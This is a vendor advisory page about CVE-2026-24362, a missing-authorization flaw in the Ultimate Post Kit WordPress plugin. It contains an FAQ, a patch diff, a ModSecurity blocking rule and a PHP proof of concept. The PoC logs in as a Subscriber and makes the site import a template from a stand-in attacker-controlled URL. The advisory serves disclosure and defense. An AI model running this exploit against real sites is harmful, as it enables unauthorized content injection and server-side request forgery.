What is CVE-2026-24362?

CVE-2026-24362 is a medium-severity vulnerability in the Ultimate Post Kit Addons for Elementor plugin for WordPress, affecting versions up to 4.0.21. It is due to a missing authorization check on certain AJAX functions, allowing authenticated users with Subscriber-level access to perform unauthorized actions.

How does the vulnerability work?

The vulnerability allows authenticated users to bypass capability checks on AJAX functions that import Elementor templates. Attackers can send a POST request to specific endpoints, including a valid nonce, to execute actions that should be restricted to administrators.

Who is affected by this vulnerability?

Any WordPress site using the Ultimate Post Kit Addons for Elementor plugin version 4.0.21 or earlier is affected. Specifically, authenticated users with Subscriber-level permissions or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Ultimate Post Kit Addons for Elementor plugin you are using. If it is version 4.0.21 or earlier, your site is at risk and should be updated immediately.

How can I fix or mitigate this vulnerability?

The vulnerability is fixed in version 4.0.22 of the plugin. Update to this version or later to ensure that capability checks are enforced on the affected functions.

What does the CVSS score of 4.3 indicate?

The CVSS score of 4.3 indicates a medium severity risk. This means that while the vulnerability does not pose an immediate critical threat, it can lead to unauthorized actions that may compromise site integrity.

What are the practical risks associated with this vulnerability?

Exploitation of this vulnerability can allow attackers to import arbitrary Elementor templates, leading to potential content injection, cross-site scripting, or server-side request forgery. These actions could compromise the security and functionality of the site.

What is a proof of concept (PoC) in this context?

The proof of concept provided demonstrates how an attacker can exploit the vulnerability by using a script to authenticate and send a crafted request to the vulnerable endpoints. This illustrates the ease with which the vulnerability can be exploited.

What steps can be taken to prevent future vulnerabilities?

To prevent future vulnerabilities, regularly update all WordPress plugins and themes, conduct security audits, and implement security best practices such as least privilege access and regular monitoring of user roles.

Is this vulnerability specific to certain WordPress installations?

No, this vulnerability is not specific to certain installations but affects any WordPress site using the vulnerable version of the Ultimate Post Kit Addons for Elementor plugin, regardless of other configurations.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the plugin temporarily to prevent exploitation. Additionally, review user roles and limit access to authenticated users until the vulnerability is addressed.

How can I stay informed about future vulnerabilities?

Stay informed about future vulnerabilities by subscribing to security mailing lists, following WordPress security blogs, and regularly checking the CVE database for updates related to your plugins and themes.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 6, 2026

CVE-2026-24362: Ultimate Post Kit Addons for Elementor <= 4.0.21 – Missing Authorization (ultimate-post-kit)

CVE ID CVE-2026-24362

Plugin ultimate-post-kit

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 4.0.21

Patched Version 4.0.22

Disclosed March 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24362:
This vulnerability is a missing authorization flaw in the Ultimate Post Kit Addons for Elementor WordPress plugin. The vulnerability allows authenticated attackers with Subscriber-level permissions or higher to perform unauthorized actions intended only for administrators. The CVSS score of 4.3 reflects a medium severity impact.

Atomic Edge research identified the root cause in the plugin’s AJAX handler functions located in `/ultimate-post-kit/includes/setup-wizard/init.php`. Three functions (`import_elementor_template`, `import_upk_elementor_bundle_template`, and `import_upk_elementor_bundle_runner_template`) lacked capability checks before version 4.0.22. These functions only performed nonce verification via `check_ajax_referer(‘setup_wizard_nonce’, ‘nonce’)` but did not verify the user had administrative privileges. The vulnerable code allowed any authenticated user to trigger template import operations.

Exploitation requires an attacker to have a valid WordPress account with at least Subscriber-level access. The attacker sends a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to one of three vulnerable endpoints: `import_elementor_template`, `import_upk_elementor_bundle_template`, or `import_upk_elementor_bundle_runner_template`. The request must include a valid nonce obtained from the setup wizard interface and the `import_url` parameter containing a URL to template data. The attack bypasses authorization controls while maintaining nonce validation.

The patch adds capability checks using `current_user_can(‘manage_options’)` before executing each vulnerable function. In version 4.0.22, lines 414-416, 510-512, and 604-606 now verify administrative privileges. The patch also replaces `wp_remote_get` with `wp_safe_remote_get` on line 420 to prevent potential SSRF. Before the patch, any authenticated user could trigger template imports. After the patch, only users with `manage_options` capability (typically administrators) can execute these functions.

Successful exploitation allows attackers to import arbitrary Elementor templates from external URLs. This could lead to content injection, cross-site scripting via malicious templates, or server-side request forgery through template import URLs. While the nonce requirement limits exploitation to users with access to the setup wizard interface, any authenticated user could potentially obtain a valid nonce through social engineering or other means.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/ultimate-post-kit/admin/admin-biggopti.php
+++ b/ultimate-post-kit/admin/admin-biggopti.php
@@ -34,14 +34,6 @@
 	 * @return array|mixed
 	 */
 	private function get_api_biggopties_data() {
-
-		// 6-hour transient cache for API response
-		$transient_key = 'bdt_api_biggopties';
-		$cached = get_transient($transient_key);
-		if ($cached !== false && is_array($cached)) {
-			return $cached;
-		}
-
 		// API endpoint for biggopties - you can change this to your actual endpoint
 		$api_url = 'https://api.sigmative.io/prod/store/api/biggopti/api-data-records';

@@ -63,8 +55,6 @@
 		if( isset($biggopties) && isset($biggopties->{'ultimate-post-kit'}) ) {
 			$data = $biggopties->{'ultimate-post-kit'};
 			if (is_array($data)) {
-				$ttl = apply_filters('bdt_api_biggopties_cache_ttl', 6 * HOUR_IN_SECONDS);
-				set_transient($transient_key, $data, $ttl);
 				return $data;
 			}
 		}
@@ -312,23 +302,41 @@
 			wp_send_json_error([ 'message' => 'forbidden' ]);
 		}

+		// Don't show biggopties on plugin/theme install and upload pages
+		$current_url = isset($_POST['current_url']) ? sanitize_text_field($_POST['current_url']) : '';
+
+		if (!empty($current_url)) {
+			$excluded_patterns = [
+				'plugin-install.php',
+				'theme-install.php',
+				'action=upload-plugin',
+				'action=upload-theme'
+			];
+
+			foreach ($excluded_patterns as $pattern) {
+				if (strpos($current_url, $pattern) !== false) {
+					wp_send_json_success([ 'html' => '' ]);
+				}
+			}
+		}
+
 		$biggopties = $this->get_api_biggopties_data();
 		$grouped_biggopties = [];

 		if (is_array($biggopties)) {
 			foreach ($biggopties as $index => $biggopti) {
 				if ($this->should_show_biggopti($biggopti)) {
-					$biggopti_class = isset($biggopti->biggopti_class) ? $biggopti->biggopti_class : 'default-' . $index;
-					if (!isset($grouped_biggopties[$biggopti_class])) {
-						$grouped_biggopties[$biggopti_class] = $biggopti;
+					$display_id = isset($biggopti->display_id) ? $biggopti->display_id : 'default-' . $index;
+					if (!isset($grouped_biggopties[$display_id])) {
+						$grouped_biggopties[$display_id] = $biggopti;
 					}
 				}
 			}
 		}

 		// Build biggopties using the same pipeline as synchronous rendering
-		foreach ($grouped_biggopties as $biggopti_class => $biggopti) {
-			$biggopti_id = isset($biggopti->id) ? $biggopti_class : $biggopti->id;
+		foreach ($grouped_biggopties as $display_id => $biggopti) {
+			$biggopti_id = isset($biggopti->id) ? $display_id : $biggopti->id;

 			self::add_biggopti([
 				'id' => 'api-biggopti-' . $biggopti_id,
@@ -374,6 +382,14 @@
 				update_user_meta(get_current_user_id(), $id, true);
 			} else {
 				set_transient($id, true, $time);
+
+				// Also store in options table for persistence
+				$dismissals_option = get_option('bdt_biggopti_dismissals', []);
+				$dismissals_option[$id] = [
+					'dismissed_at' => time(),
+					'expires_at' => time() + intval($time),
+				];
+				update_option('bdt_biggopti_dismissals', $dismissals_option, false);
 			}

 			wp_send_json_success();
@@ -444,6 +460,22 @@
 				$expired = get_user_meta(get_current_user_id(), $biggopti_id, true);
 			} elseif ('transient' === $biggopti['dismissible-meta']) {
 				$expired = get_transient($biggopti_id);
+
+				// If transient not found, check options table for persistent dismissal
+				if (false === $expired || empty($expired)) {
+					$dismissals_option = get_option('bdt_biggopti_dismissals', []);
+					if (isset($dismissals_option[$biggopti_id])) {
+						$dismissal = $dismissals_option[$biggopti_id];
+						// Check if dismissal is still valid (not expired)
+						if (isset($dismissal['expires_at']) && time() < $dismissal['expires_at']) {
+							$expired = true;
+						} else {
+							// Clean up expired dismissal from options
+							unset($dismissals_option[$biggopti_id]);
+							update_option('bdt_biggopti_dismissals', $dismissals_option, false);
+						}
+					}
+				}
 			}

 			// Biggopties visible after transient expire.
--- a/ultimate-post-kit/includes/setup-wizard/init.php
+++ b/ultimate-post-kit/includes/setup-wizard/init.php
@@ -412,9 +412,14 @@
 add_action('wp_ajax_import_elementor_template', function () {
 		check_ajax_referer( 'setup_wizard_nonce', 'nonce' );

+		if ( ! current_user_can( 'manage_options' ) ) {
+			wp_send_json_error( array( 'message' => esc_html__( 'Unauthorized', 'ultimate-post-kit' ) ) );
+			wp_die();
+		}
+
 		$json_url = isset( $_POST['import_url'] ) ? esc_url_raw( wp_unslash( $_POST['import_url'] ) ) : '';

-        $response = wp_remote_get($json_url, array(
+        $response = wp_safe_remote_get($json_url, array(
             'timeout'   => 60,
             'sslverify' => false
         ));
@@ -502,6 +507,11 @@
 add_action('wp_ajax_import_upk_elementor_bundle_template', function () {
     check_ajax_referer('setup_wizard_nonce', 'nonce');

+	if ( ! current_user_can( 'manage_options' ) ) {
+        wp_send_json_error( array( 'message' => esc_html__( 'Unauthorized', 'ultimate-post-kit' ) ) );
+        wp_die();
+    }
+
     $file_url = isset($_POST['import_url']) ? esc_url_raw(wp_unslash($_POST['import_url'])) : '';

     if (!filter_var($file_url, FILTER_VALIDATE_URL) || 0 !== strpos($file_url, 'http')) {
@@ -592,6 +602,11 @@
 add_action('wp_ajax_import_upk_elementor_bundle_runner_template', function () {
     check_ajax_referer('setup_wizard_nonce', 'nonce');

+	if ( ! current_user_can( 'manage_options' ) ) {
+        wp_send_json_error( array( 'message' => esc_html__( 'Unauthorized', 'ultimate-post-kit' ) ) );
+        wp_die();
+    }
+
     $runner = isset($_POST['runner']) ? sanitize_text_field(wp_unslash($_POST['runner'])) : '';
     $sessionId = isset($_POST['sessionId']) ? sanitize_text_field(wp_unslash($_POST['sessionId'])) : '';

--- a/ultimate-post-kit/ultimate-post-kit.php
+++ b/ultimate-post-kit/ultimate-post-kit.php
@@ -4,14 +4,14 @@
  * Plugin Name: Ultimate Post Kit
  * Plugin URI: https://postkit.pro/
  * Description: <a href="https://postkit.pro/">Ultimate Post Kit</a> is a packed of post related elementor widgets. This plugin gives you post related widget features for elementor page builder plugin.
- * Version: 4.0.21
+ * Version: 4.0.22
  * Author: BdThemes
  * Author URI: https://bdthemes.com/
  * Text Domain: ultimate-post-kit
  * Domain Path: /languages
  * License: GPL3
  * Elementor requires at least: 3.28
- * Elementor tested up to: 3.34.0
+ * Elementor tested up to: 3.34.1
  */

 if ( ! defined( 'ABSPATH' ) ) {
@@ -19,7 +19,7 @@
 }

 // Some pre define value for easy use
-define( 'BDTUPK_VER', '4.0.21' );
+define( 'BDTUPK_VER', '4.0.22' );
 define( 'BDTUPK__FILE__', __FILE__ );

 /**

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-24362
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:100024362,phase:2,deny,status:403,chain,msg:'CVE-2026-24362 via Ultimate Post Kit AJAX - Missing Authorization',severity:'CRITICAL',tag:'CVE-2026-24362',tag:'WordPress',tag:'Plugin',tag:'Ultimate-Post-Kit'"
  SecRule ARGS_POST:action "@pm import_elementor_template import_upk_elementor_bundle_template import_upk_elementor_bundle_runner_template" "chain"
    SecRule &ARGS_POST:nonce "!@eq 1" 
      "t:none,setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',setvar:'tx.cve_2026_24362_block=1'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24362 - Ultimate Post Kit Addons for Elementor <= 4.0.21 - Missing Authorization
<?php

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';
$username = 'subscriber_user';
$password = 'subscriber_pass';
$nonce = 'valid_setup_wizard_nonce_here'; // Must be obtained from setup wizard interface

// Step 1: Authenticate to WordPress
$login_url = str_replace('admin-ajax.php', 'wp-login.php', $target_url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Exploit missing authorization in template import
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'import_elementor_template', // Vulnerable AJAX action
    'nonce' => $nonce, // Required nonce
    'import_url' => 'https://attacker-controlled.com/malicious-template.json' // External template URL
]));
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 3: Check exploitation result
if ($http_code === 200 && strpos($response, 'success') !== false) {
    echo "Exploit successful: Template import triggered as Subscriber usern";
    echo "Response: $responsen";
} else {
    echo "Exploit failed or patchedn";
    echo "HTTP Code: $http_coden";
    echo "Response: $responsen";
}

?>

Frequently Asked Questions

What is CVE-2026-24362?
Overview of the vulnerability
CVE-2026-24362 is a medium-severity vulnerability in the Ultimate Post Kit Addons for Elementor plugin for WordPress, affecting versions up to 4.0.21. It is due to a missing authorization check on certain AJAX functions, allowing authenticated users with Subscriber-level access to perform unauthorized actions.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows authenticated users to bypass capability checks on AJAX functions that import Elementor templates. Attackers can send a POST request to specific endpoints, including a valid nonce, to execute actions that should be restricted to administrators.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Ultimate Post Kit Addons for Elementor plugin version 4.0.21 or earlier is affected. Specifically, authenticated users with Subscriber-level permissions or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Ultimate Post Kit Addons for Elementor plugin you are using. If it is version 4.0.21 or earlier, your site is at risk and should be updated immediately.
How can I fix or mitigate this vulnerability?
Recommended actions
The vulnerability is fixed in version 4.0.22 of the plugin. Update to this version or later to ensure that capability checks are enforced on the affected functions.
What does the CVSS score of 4.3 indicate?
Understanding risk levels
The CVSS score of 4.3 indicates a medium severity risk. This means that while the vulnerability does not pose an immediate critical threat, it can lead to unauthorized actions that may compromise site integrity.
What are the practical risks associated with this vulnerability?
Potential consequences
Exploitation of this vulnerability can allow attackers to import arbitrary Elementor templates, leading to potential content injection, cross-site scripting, or server-side request forgery. These actions could compromise the security and functionality of the site.
What is a proof of concept (PoC) in this context?
Demonstrating the vulnerability
The proof of concept provided demonstrates how an attacker can exploit the vulnerability by using a script to authenticate and send a crafted request to the vulnerable endpoints. This illustrates the ease with which the vulnerability can be exploited.
What steps can be taken to prevent future vulnerabilities?
Best practices for security
To prevent future vulnerabilities, regularly update all WordPress plugins and themes, conduct security audits, and implement security best practices such as least privilege access and regular monitoring of user roles.
Is this vulnerability specific to certain WordPress installations?
Scope of the vulnerability
No, this vulnerability is not specific to certain installations but affects any WordPress site using the vulnerable version of the Ultimate Post Kit Addons for Elementor plugin, regardless of other configurations.
What should I do if I cannot update the plugin immediately?
Interim measures
If you cannot update the plugin immediately, consider disabling the plugin temporarily to prevent exploitation. Additionally, review user roles and limit access to authenticated users until the vulnerability is addressed.
How can I stay informed about future vulnerabilities?
Keeping up to date
Stay informed about future vulnerabilities by subscribing to security mailing lists, following WordPress security blogs, and regularly checking the CVE database for updates related to your plugins and themes.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations